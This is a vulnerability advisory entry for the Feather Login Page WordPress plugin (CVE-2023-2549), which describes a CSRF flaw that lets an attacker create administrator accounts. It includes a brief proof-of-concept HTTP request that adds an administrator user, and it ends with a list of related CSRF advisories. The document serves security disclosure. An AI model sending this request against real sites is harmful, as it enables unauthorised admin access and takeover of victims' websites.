Feather Login Page < 1.1.2 – Cross-Site Request Forgery to Privilege Escalation | CVE 2023-2549 | Plugin Vulnerabilities

Description

The plugin does not protect its ftlpp-ext-expirable-login-link action against CSRF attacks, allowing an unauthenticated attacker to add users of any role on their behalf by tricking a logged in administrator to submit a crafted request.

Proof of Concept

POST /wp-admin/admin-ajax.php?action=ftlpp-ext-expirable-login-link HTTP/1.1
Content-Type: application/json
Cookie: [Admin+]

{"firstName":"Evil","email":"evil@example.com","role":"administrator","accountLinkExpiry":"999"}

Affects Plugins

feather-login-page

Fixed in 1.1.2

References

CVE

URL

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/feather-login-page/feather-login-page-107-111-cross-site-request-forgery-to-privilege-escalation

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Verified

No

WPVDB ID

69a6d423-b925-458f-b8a3-61836411b524

Timeline

Publicly Published

2023-05-30 (about 2 years ago)

Added

2023-05-31 (about 2 years ago)

Last Updated

2023-07-07 (about 2 years ago)

Other

Published

Title

Published

2023-08-21

Title

Herd Effects < 5.2.4 - Effect Deletion via CSRF

Published

2024-02-20

Title

Change Table Prefix <= 2.0 - Cross-Site Request Forgery via change_prefix_form

Published

2024-12-05

Title

Clickbank WordPress Plugin (Storefront) <= 1.7 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2022-10-31

Title

Mantenimiento web < 0.14 - Stored XSS via CSRF

Published

2025-04-09

Title

User Session Synchronizer <= 1.4.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting